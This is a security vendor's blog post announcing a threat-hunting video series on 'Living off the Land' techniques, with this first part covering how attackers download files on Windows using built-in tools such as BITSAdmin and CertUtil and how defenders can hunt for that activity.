Living off the Land (LotL) – Downloading Files on Microsoft Windows

Austin Jackson|March 9, 2021
Blog

Cyborg Security is starting an exciting new series of threat hunting videos dedicated to the practice of Living off the Land (LotL)!

Living off the land meme

Living off the Land (LotL) refers to threat actor behavior in which the attacker will use tools and resources that are readily available in the compromised environment. Threat actors, by using this methodology, can see tremendous gains. First, by utilizing pre-installed tools, threat actors will decrease their likelihood for detection. Second, they will minimize their operational need to bring additional tools onto a target system. Lastly, by using those toolsets, the actors can help confound attribution efforts.

New call-to-action

These videos will focus on the common tactics, techniques, and procedures (TTPs) threat actors use to remain undetected in an environment. The video series will introduce the TTPs, explore how actors use them, and what organizations can do to detect this activity in their environment.

In the first part of this new series we are taking a look at living off the land techniques for downloading remote files on Microsoft Windows. There are a plethora of different tools and binaries to accomplish downloading remote files on Microsoft Windows. BITSAdmin and CertUtil come pre-installed on all Microsoft Windows systems and are some of the most commonly used tools by threat actors to accomplish downloading remote files. Check out the video below to learn more about these tools and how to hunt for them!

 

New call-to-action

Blog

Austin Jackson

Software Engineer & Security Researcher
Follow Cyborg
  • Twitter
  • linked in

DISCOVER EVEN MORE

White Paper

March 23, 2021

Living off the Land (LotL) – RDP Hijacking
Read more
White Paper

March 9, 2021

Living off the Land (LotL) – Downloading Files on Microsoft Windows
Read more
White Paper

January 21, 2021

Threat Hunt Deep Dives: Apache Struts RCE (CVE-2020-17530)
Read more

SUBSCRIBE TO OUR NEWSLETTER

Continue the Hunt
No thanks, maybe later.